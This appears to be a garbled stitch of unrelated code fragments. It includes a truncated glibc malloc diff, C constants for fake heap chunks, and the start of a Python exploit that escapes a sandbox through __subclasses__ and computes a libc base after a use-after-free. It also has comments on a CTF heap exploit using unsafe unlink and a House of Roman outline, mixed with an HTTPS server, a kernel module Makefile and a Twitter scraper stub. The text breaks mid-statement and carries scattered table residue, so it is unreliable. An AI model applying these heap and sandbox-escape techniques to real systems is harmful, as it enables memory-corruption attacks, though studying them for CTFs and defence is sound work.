--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -4281,6 +4281,8 @@ _int_free (mstate av, mchunkptr p, int have_lock)
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
+ if (__glibc_unlikely (chunksize(p) != prevsize))
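#include <stdio.h>
#include <stdlib.h>

/*
 * Fixed values used by the rest of this listing. Only the directives below
 * are visible here, so how each value is used is not shown. The trailing
 * table-cell residue left by the page rendering has been dropped so every
 * directive is valid on its own line.
 */

/* Object-like constant. glibc's malloc.c has a function-like macro with the
 * same name; this definition is a plain number and is unrelated to it. */
#define chunksize 0x8
#define fakesize 0x20

/* Width of one size_t word, and the low-bit mask for 2*SIZE_SZ alignment. */
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)

/* Hard-coded per word size; enable exactly one of the two definitions. */
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */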
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
# import Collection | |
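# Walks from the empty tuple's type to its base class (object) and takes one
# entry from object's subclass list instead of using the builtin name.
# Every type stays reachable this way from any object, so a namespace with
# the builtins removed is not an isolation boundary on its own.
# NOTE(review): index 5 depends on the interpreter build; presumably it
# resolves to the bytearray type on the author's target - verify.
bytearray = ().__class__.__base__.__subclasses__()[5]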
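def p64(addr):
    """Pack an integer as 8 little-endian bytes.

    The value is rendered as 16 zero-padded hex digits, decoded with
    ``fromhex`` and then reversed. ``bytearray`` is whatever that name is
    bound to at module level when the function is called.

    Values that need more than 16 hex digits are not truncated, and a
    negative value makes ``fromhex`` raise ``ValueError``.
    """
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]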
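# Create one Collection object; only its identity is used on the next line.
b = Collection.Collection({'1':0x1337})
# In CPython id() is the object's memory address, so this derives another
# address from it with two fixed constants.
# NOTE(review): the constants are presumably offsets measured on one specific
# build of the target; nothing in this listing shows they hold elsewhere.
libc_base = id(b) + 0xe27198 - 0x13e0dd0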
#!/usr/bin/env python2 | |
# -*- coding: utf-8 -*- | |
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300. | |
# You could free allocations and read/write to them even after they got freed. | |
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques. | |
# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore. | |
# Afterwards we can get a write-what-where primitive using unsafe unlink. |
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE, | |
but do not have a relocation table to allow ASLR to function. | |
usage: checkaslr.py <dir> | |
ex: checkaslr.py "C:\Program Files\" | |
requires: pefile <https://github.com/erocarrera/pefile>, which should be | |
installable via: pip install pefile | |
''' |
- Disclaimer
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
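# Out-of-tree kernel module build: kbuild links afw.o from the three objects
# listed in afw-objs, compiled with the flags in ccflags-y.
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2

# Neither target names a file on disk.
.PHONY: all clean

# Both targets hand off to the kbuild tree of the currently running kernel
# (uname -r). $(MAKE) is used for the recursive call so that command-line
# flags and the jobserver are passed down. Recipe lines start with a tab.
all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean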
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
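# generate server.xml with the following command (as written, the command
# puts both the key and the certificate in server.pem, and -nodes leaves the
# private key unencrypted):
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes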
# run as follows: | |
# python simple-https-server.py | |
# then in your browser, visit: | |
# https://localhost:4443 | |
import BaseHTTPServer, SimpleHTTPServer | |
import ssl |
#!/usr/bin/env python | |
# encoding: utf-8 | |
import tweepy #https://github.com/tweepy/tweepy | |
import csv | |
#Twitter API credentials | |
consumer_key = "" | |
consumer_secret = "" | |
access_key = "" |